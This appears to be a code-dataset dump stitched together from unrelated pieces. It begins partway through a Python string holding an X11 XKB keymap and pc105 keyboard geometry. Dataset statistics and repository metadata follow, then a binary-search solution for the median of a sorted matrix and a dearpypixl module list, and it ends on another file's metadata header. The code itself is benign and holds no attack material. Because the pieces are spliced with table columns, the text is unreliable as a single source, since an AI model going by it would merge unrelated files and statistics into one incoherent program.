symbols[Group1]= [ 7, ampersand, braceleft, seveneighths ],
symbols[Group2]= [ 7, ampersand ]
};
key <AE08> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 8, asterisk, bracketleft, trademark ],
symbols[Group2]= [ 8, asterisk ]
};
key <AE09> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 9, parenleft, bracketright, plusminus ],
symbols[Group2]= [ 9, parenleft ]
};
key <AE10> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 0, parenright, braceright, degree ],
symbols[Group2]= [ 0, parenright ]
};
key <AE11> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ minus, underscore, backslash, questiondown ],
symbols[Group2]= [ minus, underscore ]
};
key <AE12> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ equal, plus, dead_cedilla, dead_ogonek ],
symbols[Group2]= [ equal, plus ]
};
key <BKSP> { [ BackSpace, BackSpace ] };
key <TAB> { [ Tab, ISO_Left_Tab ] };
key <AD01> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ q, Q, at, Greek_OMEGA ],
symbols[Group2]= [ q, Q ]
};
key <AD02> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ w, W, lstroke, Lstroke ],
symbols[Group2]= [ w, W ]
};
key <AD03> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ e, E, e, E ],
symbols[Group2]= [ e, E ]
};
key <AD04> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ r, R, paragraph, registered ],
symbols[Group2]= [ r, R ]
};
key <AD05> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ t, T, tslash, Tslash ],
symbols[Group2]= [ t, T ]
};
key <AD06> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ y, Y, leftarrow, yen ],
symbols[Group2]= [ y, Y ]
};
key <AD07> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ u, U, downarrow, uparrow ],
symbols[Group2]= [ u, U ]
};
key <AD08> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ i, I, rightarrow, idotless ],
symbols[Group2]= [ i, I ]
};
key <AD09> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ o, O, oslash, Oslash ],
symbols[Group2]= [ o, O ]
};
key <AD10> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ p, P, thorn, THORN ],
symbols[Group2]= [ p, P ]
};
key <AD11> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ bracketleft, braceleft, dead_diaeresis, dead_abovering ],
symbols[Group2]= [ bracketleft, braceleft ]
};
key <AD12> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ bracketright, braceright, dead_tilde, dead_macron ],
symbols[Group2]= [ bracketright, braceright ]
};
key <RTRN> { [ Return ] };
key <LCTL> { [ Control_L ] };
key <AC01> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ a, A, ae, AE ],
symbols[Group2]= [ a, A ]
};
key <AC02> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ s, S, ssharp, section ],
symbols[Group2]= [ s, S ]
};
key <AC03> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ d, D, eth, ETH ],
symbols[Group2]= [ d, D ]
};
key <AC04> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ f, F, dstroke, ordfeminine ],
symbols[Group2]= [ f, F ]
};
key <AC05> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ g, G, eng, ENG ],
symbols[Group2]= [ g, G ]
};
key <AC06> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ h, H, hstroke, Hstroke ],
symbols[Group2]= [ h, H ]
};
key <AC07> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ j, J, dead_hook, dead_horn ],
symbols[Group2]= [ j, J ]
};
key <AC08> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ k, K, kra, ampersand ],
symbols[Group2]= [ k, K ]
};
key <AC09> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ l, L, lstroke, Lstroke ],
symbols[Group2]= [ l, L ]
};
key <AC10> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ semicolon, colon, dead_acute, dead_doubleacute ],
symbols[Group2]= [ semicolon, colon ]
};
key <AC11> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ apostrophe, at, dead_circumflex, dead_caron ],
symbols[Group2]= [ apostrophe, quotedbl ]
};
key <TLDE> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ grave, notsign, bar, bar ],
symbols[Group2]= [ grave, asciitilde ]
};
key <LFSH> { [ Shift_L ] };
key <BKSL> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ numbersign, asciitilde, dead_grave, dead_breve ],
symbols[Group2]= [ backslash, bar ]
};
key <AB01> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ z, Z, guillemotleft, less ],
symbols[Group2]= [ z, Z ]
};
key <AB02> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ x, X, guillemotright, greater ],
symbols[Group2]= [ x, X ]
};
key <AB03> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ c, C, cent, copyright ],
symbols[Group2]= [ c, C ]
};
key <AB04> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ v, V, leftdoublequotemark, leftsinglequotemark ],
symbols[Group2]= [ v, V ]
};
key <AB05> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ b, B, rightdoublequotemark, rightsinglequotemark ],
symbols[Group2]= [ b, B ]
};
key <AB06> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ n, N, n, N ],
symbols[Group2]= [ n, N ]
};
key <AB07> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ m, M, mu, masculine ],
symbols[Group2]= [ m, M ]
};
key <AB08> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ comma, less, horizconnector, multiply ],
symbols[Group2]= [ comma, less ]
};
key <AB09> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ period, greater, periodcentered, division ],
symbols[Group2]= [ period, greater ]
};
key <AB10> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ slash, question, dead_belowdot, dead_abovedot ],
symbols[Group2]= [ slash, question ]
};
key <RTSH> { [ Shift_R ] };
key <KPMU> {
type= "CTRL+ALT",
symbols[Group1]= [ KP_Multiply, KP_Multiply, KP_Multiply, KP_Multiply, XF86ClearGrab ]
};
key <LALT> { [ Alt_L, Meta_L ] };
key <SPCE> { [ space ] };
key <CAPS> { [ Caps_Lock ] };
key <FK01> {
type= "CTRL+ALT",
symbols[Group1]= [ F1, F1, F1, F1, XF86Switch_VT_1 ]
};
key <FK02> {
type= "CTRL+ALT",
symbols[Group1]= [ F2, F2, F2, F2, XF86Switch_VT_2 ]
};
key <FK03> {
type= "CTRL+ALT",
symbols[Group1]= [ F3, F3, F3, F3, XF86Switch_VT_3 ]
};
key <FK04> {
type= "CTRL+ALT",
symbols[Group1]= [ F4, F4, F4, F4, XF86Switch_VT_4 ]
};
key <FK05> {
type= "CTRL+ALT",
symbols[Group1]= [ F5, F5, F5, F5, XF86Switch_VT_5 ]
};
key <FK06> {
type= "CTRL+ALT",
symbols[Group1]= [ F6, F6, F6, F6, XF86Switch_VT_6 ]
};
key <FK07> {
type= "CTRL+ALT",
symbols[Group1]= [ F7, F7, F7, F7, XF86Switch_VT_7 ]
};
key <FK08> {
type= "CTRL+ALT",
symbols[Group1]= [ F8, F8, F8, F8, XF86Switch_VT_8 ]
};
key <FK09> {
type= "CTRL+ALT",
symbols[Group1]= [ F9, F9, F9, F9, XF86Switch_VT_9 ]
};
key <FK10> {
type= "CTRL+ALT",
symbols[Group1]= [ F10, F10, F10, F10, XF86Switch_VT_10 ]
};
key <NMLK> { [ Num_Lock ] };
key <SCLK> { [ Scroll_Lock ] };
key <KP7> { [ KP_Home, KP_7 ] };
key <KP8> { [ KP_Up, KP_8 ] };
key <KP9> { [ KP_Prior, KP_9 ] };
key <KPSU> {
type= "CTRL+ALT",
symbols[Group1]= [ KP_Subtract, KP_Subtract, KP_Subtract, KP_Subtract, XF86Prev_VMode ]
};
key <KP4> { [ KP_Left, KP_4 ] };
key <KP5> { [ KP_Begin, KP_5 ] };
key <KP6> { [ KP_Right, KP_6 ] };
key <KPAD> {
type= "CTRL+ALT",
symbols[Group1]= [ KP_Add, KP_Add, KP_Add, KP_Add, XF86Next_VMode ]
};
key <KP1> { [ KP_End, KP_1 ] };
key <KP2> { [ KP_Down, KP_2 ] };
key <KP3> { [ KP_Next, KP_3 ] };
key <KP0> { [ KP_Insert, KP_0 ] };
key <KPDL> { [ KP_Delete, KP_Decimal ] };
key <LVL3> {
type= "ONE_LEVEL",
symbols[Group1]= [ ISO_Level3_Shift ]
};
key <LSGT> {
type= "FOUR_LEVEL",
symbols[Group1]= [ backslash, bar, bar, brokenbar ]
};
key <FK11> {
type= "CTRL+ALT",
symbols[Group1]= [ F11, F11, F11, F11, XF86Switch_VT_11 ]
};
key <FK12> {
type= "CTRL+ALT",
symbols[Group1]= [ F12, F12, F12, F12, XF86Switch_VT_12 ]
};
key <KATA> { [ Katakana ] };
key <HIRA> { [ Hiragana ] };
key <HENK> { [ Henkan_Mode ] };
key <HKTG> { [ Hiragana_Katakana ] };
key <MUHE> { [ Muhenkan ] };
key <KPEN> { [ KP_Enter ] };
key <RCTL> { [ Control_R ] };
key <KPDV> {
type= "CTRL+ALT",
symbols[Group1]= [ KP_Divide, KP_Divide, KP_Divide, KP_Divide, XF86Ungrab ]
};
key <PRSC> {
type= "PC_ALT_LEVEL2",
symbols[Group1]= [ Print, Sys_Req ]
};
key <RALT> {
type= "TWO_LEVEL",
symbols[Group1]= [ Multi_key, Multi_key ]
};
key <LNFD> { [ Linefeed ] };
key <HOME> { [ Home ] };
key <UP> { [ Up ] };
key <PGUP> { [ Prior ] };
key <LEFT> { [ Left ] };
key <RGHT> { [ Right ] };
key <END> { [ End ] };
key <DOWN> { [ Down ] };
key <PGDN> { [ Next ] };
key <INS> { [ Insert ] };
key <DELE> { [ Delete ] };
key <MUTE> { [ XF86AudioMute ] };
key <VOL-> { [ XF86AudioLowerVolume ] };
key <VOL+> { [ XF86AudioRaiseVolume ] };
key <POWR> { [ XF86PowerOff ] };
key <KPEQ> { [ KP_Equal ] };
key <I126> { [ plusminus ] };
key <PAUS> {
type= "PC_CONTROL_LEVEL2",
symbols[Group1]= [ Pause, Break ]
};
key <I128> { [ XF86LaunchA ] };
key <I129> { [ KP_Decimal, KP_Decimal ] };
key <HNGL> { [ Hangul ] };
key <HJCV> { [ Hangul_Hanja ] };
key <LWIN> { [ Super_L ] };
key <RWIN> { [ Super_R ] };
key <COMP> { [ Menu ] };
key <STOP> { [ Cancel ] };
key <AGAI> { [ Redo ] };
key <PROP> { [ SunProps ] };
key <UNDO> { [ Undo ] };
key <FRNT> { [ SunFront ] };
key <COPY> { [ XF86Copy ] };
key <OPEN> { [ XF86Open ] };
key <PAST> { [ XF86Paste ] };
key <FIND> { [ Find ] };
key <CUT> { [ XF86Cut ] };
key <HELP> { [ Help ] };
key <I147> { [ XF86MenuKB ] };
key <I148> { [ XF86Calculator ] };
key <I150> { [ XF86Sleep ] };
key <I151> { [ XF86WakeUp ] };
key <I152> { [ XF86Explorer ] };
key <I153> { [ XF86Send ] };
key <I155> { [ XF86Xfer ] };
key <I156> { [ XF86Launch1 ] };
key <I157> { [ XF86Launch2 ] };
key <I158> { [ XF86WWW ] };
key <I159> { [ XF86DOS ] };
key <I160> { [ XF86ScreenSaver ] };
key <I161> { [ XF86RotateWindows ] };
key <I162> { [ XF86TaskPane ] };
key <I163> { [ XF86Mail ] };
key <I164> { [ XF86Favorites ] };
key <I165> { [ XF86MyComputer ] };
key <I166> { [ XF86Back ] };
key <I167> { [ XF86Forward ] };
key <I169> { [ XF86Eject ] };
key <I170> { [ XF86Eject, XF86Eject ] };
key <I171> { [ XF86AudioNext ] };
key <I172> { [ XF86AudioPlay, XF86AudioPause ] };
key <I173> { [ XF86AudioPrev ] };
key <I174> { [ XF86AudioStop, XF86Eject ] };
key <I175> { [ XF86AudioRecord ] };
key <I176> { [ XF86AudioRewind ] };
key <I177> { [ XF86Phone ] };
key <I179> { [ XF86Tools ] };
key <I180> { [ XF86HomePage ] };
key <I181> { [ XF86Reload ] };
key <I182> { [ XF86Close ] };
key <I185> { [ XF86ScrollUp ] };
key <I186> { [ XF86ScrollDown ] };
key <I187> { [ parenleft ] };
key <I188> { [ parenright ] };
key <I189> { [ XF86New ] };
key <I190> { [ Redo ] };
key <FK13> { [ XF86Tools ] };
key <FK14> { [ XF86Launch5 ] };
key <FK15> { [ XF86Launch6 ] };
key <FK16> { [ XF86Launch7 ] };
key <FK17> { [ XF86Launch8 ] };
key <FK18> { [ XF86Launch9 ] };
key <FK20> { [ XF86AudioMicMute ] };
key <FK21> { [ XF86TouchpadToggle ] };
key <FK22> { [ XF86TouchpadOn ] };
key <FK23> { [ XF86TouchpadOff ] };
key <MDSW> { [ Mode_switch ] };
key <ALT> { [ NoSymbol, Alt_L ] };
key <META> { [ NoSymbol, Meta_L ] };
key <SUPR> { [ NoSymbol, Super_L ] };
key <HYPR> { [ NoSymbol, Hyper_L ] };
key <I208> { [ XF86AudioPlay ] };
key <I209> { [ XF86AudioPause ] };
key <I210> { [ XF86Launch3 ] };
key <I211> { [ XF86Launch4 ] };
key <I212> { [ XF86LaunchB ] };
key <I213> { [ XF86Suspend ] };
key <I214> { [ XF86Close ] };
key <I215> { [ XF86AudioPlay ] };
key <I216> { [ XF86AudioForward ] };
key <I218> { [ Print ] };
key <I220> { [ XF86WebCam ] };
key <I223> { [ XF86Mail ] };
key <I224> { [ XF86Messenger ] };
key <I225> { [ XF86Search ] };
key <I226> { [ XF86Go ] };
key <I227> { [ XF86Finance ] };
key <I228> { [ XF86Game ] };
key <I229> { [ XF86Shop ] };
key <I231> { [ Cancel ] };
key <I232> { [ XF86MonBrightnessDown ] };
key <I233> { [ XF86MonBrightnessUp ] };
key <I234> { [ XF86AudioMedia ] };
key <I235> { [ XF86Display ] };
key <I236> { [ XF86KbdLightOnOff ] };
key <I237> { [ XF86KbdBrightnessDown ] };
key <I238> { [ XF86KbdBrightnessUp ] };
key <I239> { [ XF86Send ] };
key <I240> { [ XF86Reply ] };
key <I241> { [ XF86MailForward ] };
key <I242> { [ XF86Save ] };
key <I243> { [ XF86Documents ] };
key <I244> { [ XF86Battery ] };
key <I245> { [ XF86Bluetooth ] };
key <I246> { [ XF86WLAN ] };
modifier_map Control { <LCTL> };
modifier_map Shift { <LFSH> };
modifier_map Shift { <RTSH> };
modifier_map Mod1 { <LALT> };
modifier_map Lock { <CAPS> };
modifier_map Mod2 { <NMLK> };
modifier_map Mod5 { <LVL3> };
modifier_map Control { <RCTL> };
modifier_map Mod4 { <LWIN> };
modifier_map Mod4 { <RWIN> };
modifier_map Mod5 { <MDSW> };
modifier_map Mod1 { <META> };
modifier_map Mod4 { <SUPR> };
modifier_map Mod4 { <HYPR> };
};
xkb_geometry "pc(pc105)" {
width= 470;
height= 180;
alias <AC00> = <CAPS>;
alias <AA00> = <LCTL>;
baseColor= "white";
labelColor= "black";
xfont= "-*-helvetica-medium-r-normal--*-120-*-*-*-*-iso8859-1";
description= "Generic 105";
shape "NORM" {
corner= 1,
{ [ 18, 18 ] },
{ [ 2, 1 ], [ 16, 16 ] }
};
shape "BKSP" {
corner= 1,
{ [ 38, 18 ] },
{ [ 2, 1 ], [ 36, 16 ] }
};
shape "TABK" {
corner= 1,
{ [ 28, 18 ] },
{ [ 2, 1 ], [ 26, 16 ] }
};
shape "BKSL" {
corner= 1,
{ [ 28, 18 ] },
{ [ 2, 1 ], [ 26, 16 ] }
};
shape "RTRN" {
corner= 1,
{ [ 0, 0 ], [ 28, 0 ], [ 28, 37 ], [ 5, 37 ],
[ 5, 18 ], [ 0, 18 ] },
{ [ 2, 1 ], [ 26, 1 ], [ 26, 35 ], [ 7, 35 ],
[ 7, 16 ], [ 2, 16 ] },
approx= { [ 5, 0 ], [ 28, 37 ] }
};
shape "CAPS" {
corner= 1,
{ [ 33, 18 ] },
{ [ 2, 1 ], [ 31, 16 ] }
};
shape "LFSH" {
corner= 1,
{ [ 25, 18 ] },
{ [ 2, 1 ], [ 23, 16 ] }
};
shape "RTSH" {
corner= 1,
{ [ 50, 18 ] },
{ [ 2, 1 ], [ 48, 16 ] }
};
shape "MODK" {
corner= 1,
{ [ 27, 18 ] },
{ [ 2, 1 ], [ 25, 16 ] }
};
shape "SMOD" {
corner= 1,
{ [ 23, 18 ] },
{ [ 2, 1 ], [ 21, 16 ] }
};
shape "SPCE" {
corner= 1,
{ [ 113, 18 ] },
{ [ 2, 1 ], [ 111, 16 ] }
};
shape "KP0" {
corner= 1,
{ [ 37, 18 ] },
{ [ 2, 1 ], [ 35, 16 ] }
};
shape "KPAD" {
corner= 1,
{ [ 18, 37 ] },
{ [ 2, 1 ], [ 16, 35 ] }
};
shape "LEDS" { { [ 75, 20 ] } };
shape "LED" { { [ 5, 1 ] } };
section "Function" {
key.color= "grey20";
priority= 7;
top= 22;
left= 19;
width= 351;
height= 19;
row {
top= 1;
left= 1;
keys {
{ <ESC>, "NORM", 1 },
{ <FK01>, "NORM", 20, color="white" },
{ <FK02>, "NORM", 1, color="white" },
{ <FK03>, "NORM", 1, color="white" },
{ <FK04>, "NORM", 1, color="white" },
{ <FK05>, "NORM", 11, color="white" },
{ <FK06>, "NORM", 1, color="white" },
{ <FK07>, "NORM", 1, color="white" },
{ <FK08>, "NORM", 1, color="white" },
{ <FK09>, "NORM", 11, color="white" },
{ <FK10>, "NORM", 1, color="white" },
{ <FK11>, "NORM", 1, color="white" },
{ <FK12>, "NORM", 1, color="white" },
{ <PRSC>, "NORM", 8, color="white" },
{ <SCLK>, "NORM", 1, color="white" },
{ <PAUS>, "NORM", 1, color="white" }
};
};
}; // End of "Function" section
section "Alpha" {
key.color= "white";
priority= 8;
top= 61;
left= 19;
width= 287;
height= 95;
row {
top= 1;
left= 1;
keys {
{ <TLDE>, "NORM", 1 }, { <AE01>, "NORM", 1 },
{ <AE02>, "NORM", 1 }, { <AE03>, "NORM", 1 },
{ <AE04>, "NORM", 1 }, { <AE05>, "NORM", 1 },
{ <AE06>, "NORM", 1 }, { <AE07>, "NORM", 1 },
{ <AE08>, "NORM", 1 }, { <AE09>, "NORM", 1 },
{ <AE10>, "NORM", 1 }, { <AE11>, "NORM", 1 },
{ <AE12>, "NORM", 1 },
{ <BKSP>, "BKSP", 1, color="grey20" }
};
};
row {
top= 20;
left= 1;
keys {
{ <TAB>, "TABK", 1, color="grey20" },
{ <AD01>, "NORM", 1 }, { <AD02>, "NORM", 1 },
{ <AD03>, "NORM", 1 }, { <AD04>, "NORM", 1 },
{ <AD05>, "NORM", 1 }, { <AD06>, "NORM", 1 },
{ <AD07>, "NORM", 1 }, { <AD08>, "NORM", 1 },
{ <AD09>, "NORM", 1 }, { <AD10>, "NORM", 1 },
{ <AD11>, "NORM", 1 }, { <AD12>, "NORM", 1 },
{ <RTRN>, "RTRN", 1, color="grey20" }
};
};
row {
top= 39;
left= 1;
keys {
{ <CAPS>, "CAPS", 1, color="grey20" },
{ <AC01>, "NORM", 1 }, { <AC02>, "NORM", 1 },
{ <AC03>, "NORM", 1 }, { <AC04>, "NORM", 1 },
{ <AC05>, "NORM", 1 }, { <AC06>, "NORM", 1 },
{ <AC07>, "NORM", 1 }, { <AC08>, "NORM", 1 },
{ <AC09>, "NORM", 1 }, { <AC10>, "NORM", 1 },
{ <AC11>, "NORM", 1 }, { <BKSL>, "NORM", 1 }
};
};
row {
top= 58;
left= 1;
keys {
{ <LFSH>, "LFSH", 1, color="grey20" },
{ <LSGT>, "NORM", 1 }, { <AB01>, "NORM", 1 },
{ <AB02>, "NORM", 1 }, { <AB03>, "NORM", 1 },
{ <AB04>, "NORM", 1 }, { <AB05>, "NORM", 1 },
{ <AB06>, "NORM", 1 }, { <AB07>, "NORM", 1 },
{ <AB08>, "NORM", 1 }, { <AB09>, "NORM", 1 },
{ <AB10>, "NORM", 1 },
{ <RTSH>, "RTSH", 1, color="grey20" }
};
};
row {
top= 77;
left= 1;
keys {
{ <LCTL>, "MODK", 1, color="grey20" },
{ <LWIN>, "SMOD", 1, color="grey20" },
{ <LALT>, "SMOD", 1, color="grey20" },
{ <SPCE>, "SPCE", 1 },
{ <RALT>, "SMOD", 1, color="grey20" },
{ <RWIN>, "SMOD", 1, color="grey20" },
{ <MENU>, "SMOD", 1, color="grey20" },
{ <RCTL>, "SMOD", 1, color="grey20" }
};
};
}; // End of "Alpha" section
section "Editing" {
key.color= "grey20";
priority= 9;
top= 61;
left= 312;
width= 58;
height= 95;
row {
top= 1;
left= 1;
keys {
{ <INS>, "NORM", 1 }, { <HOME>, "NORM", 1 },
{ <PGUP>, "NORM", 1 }
};
};
row {
top= 20;
left= 1;
keys {
{ <DELE>, "NORM", 1 }, { <END>, "NORM", 1 },
{ <PGDN>, "NORM", 1 }
};
};
row {
top= 58;
left= 20;
keys {
{ <UP>, "NORM", 1 }
};
};
row {
top= 77;
left= 1;
keys {
{ <LEFT>, "NORM", 1 }, { <DOWN>, "NORM", 1 },
{ <RGHT>, "NORM", 1 }
};
};
}; // End of "Editing" section
section "Keypad" {
key.color= "grey20";
priority= 10;
top= 61;
left= 376;
width= 77;
height= 95;
row {
top= 1;
left= 1;
keys {
{ <NMLK>, "NORM", 1 }, { <KPDV>, "NORM", 1 },
{ <KPMU>, "NORM", 1 }, { <KPSU>, "NORM", 1 }
};
};
row {
top= 20;
left= 1;
keys {
{ <KP7>, "NORM", 1, color="white" },
{ <KP8>, "NORM", 1, color="white" },
{ <KP9>, "NORM", 1, color="white" },
{ <KPAD>, "KPAD", 1 }
};
};
row {
top= 39;
left= 1;
keys {
{ <KP4>, "NORM", 1, color="white" },
{ <KP5>, "NORM", 1, color="white" },
{ <KP6>, "NORM", 1, color="white" }
};
};
row {
top= 58;
left= 1;
keys {
{ <KP1>, "NORM", 1, color="white" },
{ <KP2>, "NORM", 1, color="white" },
{ <KP3>, "NORM", 1, color="white" },
{ <KPEN>, "KPAD", 1 }
};
};
row {
top= 77;
left= 1;
keys {
{ <KP0>, "KP0", 1, color="white" },
{ <KPDL>, "NORM", 1, color="white" }
};
};
}; // End of "Keypad" section
solid "LedPanel" {
top= 22;
left= 377;
priority= 0;
color= "grey10";
shape= "LEDS";
};
indicator "Num Lock" {
top= 37;
left= 382;
priority= 1;
onColor= "green";
offColor= "green30";
shape= "LED";
};
indicator "Caps Lock" {
top= 37;
left= 407;
priority= 2;
onColor= "green";
offColor= "green30";
shape= "LED";
};
indicator "Scroll Lock" {
top= 37;
left= 433;
priority= 3;
onColor= "green";
offColor= "green30";
shape= "LED";
};
text "NumLockLabel" {
top= 25;
left= 378;
priority= 4;
width= 19.8;
height= 10;
XFont= "-*-helvetica-medium-r-normal--*-120-*-*-*-*-iso8859-1";
text= "Num\nLock";
};
text "CapsLockLabel" {
top= 25;
left= 403;
priority= 5;
width= 26.4;
height= 10;
XFont= "-*-helvetica-medium-r-normal--*-120-*-*-*-*-iso8859-1";
text= "Caps\nLock";
};
text "ScrollLockLabel" {
top= 25;
left= 428;
priority= 6;
width= 39.6;
height= 10;
XFont= "-*-helvetica-medium-r-normal--*-120-*-*-*-*-iso8859-1";
text= "Scroll\nLock";
};
};
};
"""
sample_keymap_bytes = sample_keymap_string.encode('ascii')
| 33.127153 | 126 | 0.469163 | 6,053 | 65,393 | 4.98381 | 0.178094 | 0.047801 | 0.035138 | 0.042165 | 0.520304 | 0.486757 | 0.407333 | 0.34846 | 0.313952 | 0.290881 | 0 | 0.080727 | 0.385301 | 65,393 | 1,973 | 127 | 33.143943 | 0.669751 | 0.005475 | 0 | 0.423057 | 0 | 0.004117 | 0.998524 | 0.156704 | 0 | 0 | 0.00203 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
281e2a6c2c9796dd0389a1453cf54aee5ed53076 | 671 | py | Python | BinarySearchProbs/MedianofSortedMatrix.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 12 | 2021-06-18T16:24:27.000Z | 2021-11-04T03:30:00.000Z | BinarySearchProbs/MedianofSortedMatrix.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 32 | 2021-10-01T07:15:00.000Z | 2021-11-05T15:35:53.000Z | BinarySearchProbs/MedianofSortedMatrix.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 21 | 2021-09-29T09:16:31.000Z | 2021-10-30T10:06:21.000Z | class Solution:
# @param A : list of list of integers
# @return an integer
def cnt(self, A, mid):
l = 0
r = len(A)-1
while l <= r:
m = (l+r)//2
if A[m] <= mid:
l = m+1
else:
r = m-1
return l
def findMedian(self, A):
l = 1
r = 1000000000
n = len(A)
m = len(A[0])
while l <= r:
mid = (l+r)//2
ct = 0
for i in range(n):
ct += self.cnt(A[i], mid)
if ct <= (n*m)//2:
l = mid+1
else:
r = mid-1
return l
| 21.645161 | 41 | 0.33234 | 92 | 671 | 2.423913 | 0.347826 | 0.035874 | 0.06278 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071895 | 0.543964 | 671 | 30 | 42 | 22.366667 | 0.656863 | 0.080477 | 0 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
28228759e8f9c568f55cbfdd7c6f7062096eb04c | 182 | py | Python | dearpypixl/appitems/__init__.py | Atlamillias/pixl-engine | c4217a3a65e01e49d05bf7f07946d65484f6e1da | [
"MIT"
] | 6 | 2021-08-28T03:22:19.000Z | 2021-10-14T22:04:04.000Z | dearpypixl/appitems/__init__.py | Atlamillias/pixl-engine | c4217a3a65e01e49d05bf7f07946d65484f6e1da | [
"MIT"
] | 1 | 2021-07-29T16:51:28.000Z | 2021-08-03T00:24:11.000Z | dearpypixl/appitems/__init__.py | Atlamillias/pixl-engine | c4217a3a65e01e49d05bf7f07946d65484f6e1da | [
"MIT"
] | null | null | null | __all__ = [
'plotting',
'misc',
'colors',
'tables',
'nodes',
'containers',
'values',
'basic',
'textures',
'drawing',
]
__version__ = '1.1.1'
| 12.133333 | 21 | 0.472527 | 15 | 182 | 5.2 | 0.866667 | 0.051282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024194 | 0.318681 | 182 | 14 | 22 | 13 | 0.604839 | 0 | 0 | 0 | 0 | 0 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2824b9b4c3119f16a82e3625c2b09e34cda89cca | 2,013 | py | Python | components/google-cloud/google_cloud_pipeline_components/container/v1/gcp_launcher/delete_model_remote_runner.py | richardsliu/pipelines | ff99a9877195a028425c5bdf3d3ce4ecbe5d8f9f | [
"Apache-2.0"
